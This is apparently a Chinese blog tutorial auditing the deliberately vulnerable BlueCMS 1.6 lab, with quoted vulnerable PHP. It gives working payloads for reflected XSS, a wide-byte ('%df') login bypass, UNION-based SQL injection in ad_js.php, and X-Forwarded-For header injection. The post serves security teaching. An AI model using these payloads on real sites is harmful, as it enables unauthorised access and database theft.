代码如诗,漏洞如刀:PHP审计中的致命反模式解密

最新推荐文章于 2025-04-29 23:59:24 发布
最新推荐文章于 2025-04-29 23:59:24 发布
阅读量1.7k 收藏 42
点赞数 44
分类专栏: 网络安全 文章标签: 网络安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w11111111152/article/details/147055663
版权

免责声明:用户因使用公众号内容而产生的任何行为和后果,由用户自行承担责任。本公众号不承担因用户误解、不当使用等导致的法律责任

目录

 

一:安装靶场

二:PHP代码审计

1.重新安装漏洞

2.Xss漏洞

3.登录框漏洞

4.Sql注入

5.X-Forwarded-For注入

三:总结

一:安装靶场

下载安装bluecms靶场(下载地址:https://github.com/source-trace/bluecms

安装成功

二:PHP代码审计

1.重新安装漏洞

只要访问install就可以重新安装可利用这个漏洞修改管理员密码

2.Xss漏洞

注册抓包查看

对这个user文件中的act变量进行重点审查,因为注册页面一般和数据库挂钩,所以这个的传参可能存在漏洞。

经过筛查发现这里的过滤只有单引号,但是它开启了PHP的魔术方法,可以将我们的单引号进行转义

源代码如下

elseif($act == 'do_reg'){
	$user_name 		=	!empty($_POST['user_name']) ? trim($_POST['user_name']) : '';
	$pwd       		= 	!empty($_POST['pwd']) ? trim($_POST['pwd']) : '';
	$pwd1 	   		= 	!empty($_POST['pwd1']) ? trim($_POST['pwd1']) : '';
	$email     		= 	!empty($_POST['email']) ? trim($_POST['email']) : '';
	$safecode  		= 	!empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
	$from = !empty($from) ? base64_decode($from) : 'user.php';

	if(strlen($user_name) < 4 || strlen($user_name) > 16){
		showmsg('�û����ַ����Ȳ���');
	}
	if(strlen($pwd) < 6){
		showmsg('���벻������6���ַ�');
	}
	if($pwd != $pwd1){
		showmsg('�����������벻һ��');
	}
	if(strtolower($safecode) != strtolower($_SESSION['safecode'])){
		showmsg('��֤�����');
	}
	if($db->getone("SELECT * FROM ".table('user')." WHERE user_name='$user_name'")){
		showmsg('���û����Ѵ���');
	}
	if($db->getone("SELECT * FROM ".table('admin')." WHERE admin_name='$user_name'")){
		showmsg('���û����Ѵ���');
	}
	$sql = "INSERT INTO ".table('user')." (user_id, user_name, pwd, email, reg_time, last_login_time) VALUES ('', '$user_name', md5('$pwd'), '$email', '$timestamp', '$timestamp')";
	if(!$db->query($sql)){
		showmsg('���ź���ע���г�����');
	}else{
		$_SESSION['user_id'] = $db->insert_id();
		$_SESSION['user_name'] = $user_name;
		update_user_info($_SESSION['user_name']);
		setcookie('BLUE[user_id]', $_SESSION['user_id'], time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_name]', $user_name, time()+3600, $cookiepath, $cookiedomain);
		setcookie('BLUE[user_pwd]', md5(md5($pwd).$_CFG['cookie_hash']), time()+3600, $cookiepath, $cookiedomain);
		if(defined('UC_API') && @include_once(BLUE_ROOT.'uc_client/client.php'))
		{
		$uid = uc_user_register($user_name, $pwd, $email);



//user.php

全局过滤

if(!get_magic_quotes_gpc())
{
	$_POST = deep_addslashes($_POST);
	$_GET = deep_addslashes($_GET);
	$_COOKIES = deep_addslashes($_COOKIES);
	$_REQUEST = deep_addslashes($_REQUEST);
}
 
$timezone = "PRC";

//common.inc.php

所以我们可以利用它只能对单双引号进行过滤的缺陷对其使用非单双引号就可以注入的语句利用xss

Xss:<script>alert('XSS')</script>

Xss实验成功

3.登录框漏洞

找到这个文件进行审计

elseif($act == 'index_login'){
 	$user_name = !empty($_REQUEST['user_name']) ? trim($_REQUEST['user_name']) : '';
 	$pwd = !empty($_REQUEST['pwd']) ? trim($_REQUEST['pwd']) : '';
 	$remember = isset($_REQUEST['remember']) ? intval($_REQUEST['remember']) : 0;
 	if($user_name == ''){
 		showmsg('�û�������Ϊ��');
 	}
 	if($pwd == ''){
 		showmsg('���벻��Ϊ��');
 	}
	$row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$user_name'");
	if($row['num'] == 1){
		showmsg('ϵͳ�û��鲻�ܴ�ǰ̨��¼');
	}
	$w = login($user_name, $pwd);

//user.php 870行

除了全局变量,这里没有做任何过滤

Payload:%df ‘)or 1=1

%df ‘ (宽字节注入)被addslashes函数转义后=%df%5c=“”,所以最后的’被释放没有达到过滤效果

成功登录管理员账号

4.SQL注入

通过代码升级系统找到疑似漏洞文件

参数$ad_id 无单双引号,所以可以确定为一个漏洞

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';
if(empty($ad_id))
{
	echo 'Error!';
	exit();
}

$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
if($ad['time_set'] == 0)
{
	$ad_content = $ad['content'];
}
else
{
	if($ad['end_time'] < time())
	{
		$ad_content = $ad['exp_content'];
	}
	else
	{
		$ad_content = $ad['content'];
	}
}
$ad_content = str_replace('"', '\"',$ad_content);
$ad_content = str_replace("\r", "\\r",$ad_content);
$ad_content = str_replace("\n", "\\n",$ad_content);
echo "<!--\r\ndocument.write(\"".$ad_content."\");\r\n-->\r\n";

?>
//ad_js.php

存在全局变量转义

尝试sql注入但不得使用单双引号

Payload:ad_id=-1 order by 7

字段数为7

字段7能回显

Payload:ad_id=-1 union select 1,2,3,4,5,6,7

成功拿到数据库名,sql注入成功

Payload:ad_id= -1 union select 1,2,3,4,5,6,database()

5.X-Forwarded-For 注入

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。如果没有XFF或者另外一种相似的技术,所有通过代理服务器的连接只会显示代理服务器的IP地址,而非连接发起的原始IP地址,这样的代理服务器实际上充当了匿名服务提供者的角色,如果连接的原始IP地址不可得,恶意访问的检测与预防的难度将大大增加

根据抓包分析,传参到send,找到进行分析

elseif($act == 'send')
{
	if(empty($id))
	{
 		return false;
 	}

 	$user_id = $_SESSION['user_id'] ? $_SESSION['user_id'] : 0;
 	$mood = intval($_POST['mood']);
 	$content = !empty($_POST['comment']) ? htmlspecialchars($_POST['comment']) : '';
 	$content = nl2br($content);
 	$type = intval($_POST['type']);

/comment.php 88行

1.intval是 PHP 中的一个内置函数,用于获取变量的整数值,intval() 函数不能直接将一个对象(object)转换为整数值。

2.htmlspecialchars() 是 PHP 中一个非常重要的安全函数,用于将特殊字符转换为 HTML 实体,防止 XSS(跨站脚本)攻击。默认:& → & " → " ' → ' < → < > → >

3.nl2br() 是 PHP 中一个用于处理字符串换行的函数,它的功能是将字符串中的换行符(\n\r\n 或 \r)转换为 HTML 的 <br> 或 <br /> 标签。

经过如上分析xss漏洞被堵的死死的,继续分析找到了X-Forwarded-For

可以控制请求头中的X-Forwarded-For 中 ip进行传参,实现sql注入

报错说明可以注入

三:总结

PHP代码审计是挖掘Web应用安全隐患的核心攻防技术,聚焦于逐行审查代码逻辑,识别开发者无意引入的致命漏洞。审计核心围绕输入验证、敏感函数调用、业务逻辑缺陷三大方向展开,重点检测SQL注入、文件包含(LFI/RFI)、命令执行(RCE)、反序列化漏洞、XSS及权限绕过等高危风险。

审计方法需结合白盒+黑盒测试:静态分析通过正则匹配危险函数(如eval()system())、追踪用户输入流(从$_GET到数据库查询),动态调试则利用BurpSuite拦截请求,验证漏洞触发链。工具层面,RIPS、SonarQube可自动化扫描,但人工审计仍是突破复杂逻辑漏洞(如条件竞争、越权)的关键。

(需要源代码及各类资料联系博主免费领取!!还希望多多关注点赞支持,你的支持就是我的最大动力!!!)

[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
bluecms_v_1.6sp1代码审计
RestoreJustice的博客
03-23 1038
这是一个比较古老的cms,可以说是满目疮痍,更靶场一样。上述漏洞主要是前台的。后台同样存在类似或者没有写到的漏洞。由于自己技术有限,就到这。
代码审计bluecms 用户注册xss漏洞复现
qq_43233085的博客
03-16 1379
代码审计bluecms 用户注册xss漏洞复现bluecms代码审计漏洞复现 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 这次不用Seay挖xss漏洞,我们通过关键功能测试来审计xss漏洞。 在后台->会员管理->会员列表处,管理员是可以查看会员...
代码审计bluecms 资料修改xss漏洞复现
qq_43233085的博客
03-16 987
代码审计bluecms 资料修改xss漏洞复现bluecms代码审计漏洞复现 bluecms BlueCMS是一款专注于地方门户网站建设解决方案,基于PHP+MySQL的技术开发,全部源码开放。 复现版本为bluecmsv1.6版本,各位可自行下载。 代码审计 这次不用Seay挖xss漏洞,我们通过关键功能测试来审计xss漏洞。 在后台->会员管理->会员列表处,管理员是可以查看会员...
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件漏洞+SQL注入
m0_74321564的博客
10-12 943
BlueCMS 1.6漏洞复现CVE-2024-45894任意删除文件,需下载phpstudy,启动nignx和mysql服务。在注入时,大部分的注入语句都是在while后面的一个变量,通过跟踪那个变量值来注入。如果$_GET['ad_id']存在且非空,则使用trim()函数去除ad_id字符串两侧的空白字符,然后将结果赋值给$ ad_id。getone不是php的官方函数,那就是自定义函数,其功能应该是执行后面的SQL语句并将其值赋值给$ad,疑似有sql注入。以上漏洞属于CVE-2024-45894。
bluecms6.1版本的ad_js.php处有xss漏洞
weixin_40709439的博客
02-12 378
bluecms6.1版本的ad_js.php处有xss漏洞 adid=!empty(ad_id = !empty(adi​d=!empty(_GET[‘ad_id’]) ? trim(GET[′adid′]):′′;if(empty(_GET[&amp;#x27;ad_id&amp;#x27;]) : &amp;#x27;&amp;#x27;; if(empty(G​ET[′adi​d′]):...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 009-Web安全入门(PHP文件包含漏洞
热门推荐
时光隧道
03-01 9万+
PHP文件包含漏洞是指在PHP代码中存在安全漏洞,允许攻击者包含并执行恶意文件或代码PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
php u00a0,GitHub - bowu678/php_bugs: PHP代码审计分段讲解
weixin_33219985的博客
03-12 263
PHP代码审计分段讲解作 者:bowu本项目将会持续更新,请Star予以支持,感谢亲 :)关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩...
PHP获取git提交信意_GitHub - Richard6666/php_bugs: PHP代码审计分段讲解
weixin_33130113的博客
01-12 163
PHP代码审计分段讲解作 者:bowu本项目将会持续更新,请Star予以支持,感谢亲 :)关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩...
PHP代码审计———15、PHP代码审计之文件包含
Fly_鹏程万里
05-16 872
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调...
PHP相关漏洞------学习笔记
tell_me_404的博客
03-07 700
一、PHP文件包含漏洞 1、什么是PHP漏洞 程序开发人员一般会把重复使用的函数写到一个单个文件中,在需要使用某个函数的时候直接调用此文件,二无需再次编写,这种文件调用的过程一般被称为文件包含。开发人员为使代码变得更灵活,将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,导致客户端可以嗲用一个恶意文件,造成文件包含漏洞。几乎所有的脚本语言都会提供文件包含的功能,单文件包含漏洞在PH...
web安全-命令执行漏洞
weixin_61956136的博客
07-25 2079
web安全-命令执行漏洞
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8683
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
DeepSeek赋能Nuclei:打造网络安全检测的“超级助手”
不忘初心,护天下安全!
04-21 1100
引言各位少侠,周末快乐,幸会幸会!今天唠一个超酷的技术组合——用AI大模型给Nuclei开挂,提升漏洞检测能力!想象一下,当出现新漏洞时,少侠们经常需要根据Nuclei模板,手动扒漏洞文章、敲代码,而既然现在有了DeepSeek等AI大模型,让它们成为“智能小秘书”,喝口咖啡的工夫,模板就自动生成了!值得注意的是,Github上也有各式各样的Nuclei的自建poc仓库,如何快速集成,确保自己的Nuclei背后使用的poc仓库最大最全最准确,也是需要思考的问题!
红队系列-网络安全知识锦囊-CTF(持续更新)
aming小老弟
04-25 807
wireshark古典密码 现代密码学图片 视频 音频隐写photoshop攻击脚本writeup 官方 给的 解题思路web misc 密码学轮数限制 服务器 xxx掉混合模式 防守模式实战模式编码方式?id-2%df%df 只要 大于128 就可hackbar 用时尽量转码注入 语句 前缀。
网络准入控制系统:2025年网络安全的坚固防线
Synfuture的博客
04-25 332
客户端软件安装在需要接入网络的终端设备上,负责收集设备的各类信息,依据预先设定的控制策略对客户端提交的信息进行评估。不同身份所能访问的资源是不同的。阳途网络准入控制系统是现代网络安全体系中的重要组成部分,守护着网络空间的信息安全与稳定运行,在各个领域都发挥着不可或缺的关键作用,并将持续随着技术的发展而不断优化完善。在多分支结构的企业或大型组织中,阳途网络准入控制系统还能实现统一管理,只要其设备接入网络,都将受到统一的安全准入标准约束,避免因各地安全标准不一致而产生的安全漏洞
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
迷路的小绅士之家
04-25 1156
DDoS攻击的本质是“以多打少”的资源消耗战,其防御需要从“被动封堵”转向“主动弹性”——通过分布式架构、流量清洗、资源冗余等技术,让系统在攻击中保持“部分可用”而非“全面瘫痪”。对于企业而言,建议采用“云原生防御+本地监控”的混合模式,借助专业安全服务商的能力弥补自身短板,同时加强内部设备的安全管理(如IoT设备改默认密码、定期漏洞扫描),从源头减少被纳入僵尸网络的风险。下一篇文章将聚焦“跨站脚本攻击(XSS)”,解析攻击者如何通过浏览器漏洞窃取用户会话,以及开发者应如何构建前端安全防护体系。
面向网络安全的开源 大模型-Foundation-Sec-8B
最新发布
云上笛暮
04-29 381
Foundation-Sec-8B 的目标是整合核心网络安全知识,使其成为一个强大的基础模型,适用于各种下游网络安全任务,并推动人工智能驱动工具在公共和私营网络安全领域的进步与应用。评估结果显示,在特定的网络安全任务上,它的性能与 Llama 3.1-70B 和 GPT-40-mini 等更大规模的模型相当。它被设计为一个专注于安全的、乐于助手的助手,并在 30 个不同的安全领域进行了微调,包括攻击面威胁、云安全和 CIS Controls 等合规框架。报告中使用了包含 500 个样本的版本。
��ԿЭ��ʧ�ܣ�˫����Կ��һ�¡�idea控制台乱码
01-16
### 解决 IntelliJ IDEA 控制台中文显示乱码问题 #### 配置全局编码和项目编码 为了防止工程代码出现乱码,需进入 `Settings` > `Editor` > `File Encodings` 将 `Global Encoding` 和 `Project Encoding` 均设为 UTF-8 编码[^1]。 ```bash # 修改配置如下: Global Encoding: UTF-8 Project Encoding: UTF-8 ``` #### 调整编译器设置 对于 main 方法运行时产生的控制台乱码现象,应前往 `Settings` > `Build, Execution, Deployment` > `Compiler` 进行相应调整。具体操作是在该路径下找到 Java Compiler 或其他相关选项,并确认其输出编码同样被设定为 UTF-8。 #### 修改 VM Options 文件 当 Tomcat 运行过程中发生控制台乱码的情况,则可能需要编辑位于 IDE 安装目录下的 bin 文件夹中的 `idea64.exe.vmoptions` 或者 `idea64.vmoptions` 文件,在其中添加 `-Dfile.encoding=UTF-8` 参数以确保 JVM 使用正确的字符集处理输入输出流[^2]。 ```properties -Dfile.encoding=UTF-8 ``` 通过上述措施可以有效改善并解决大部分情况下 IntelliJ IDEA 中文环境下的终端输出乱码状况。如果仍然存在个别特殊场景下的乱码问题,建议进一步检查具体的日志记录方式以及第三方库的兼容性等问题。
评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全瞭望Sec

感谢您的打赏,您的支持让我更加

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值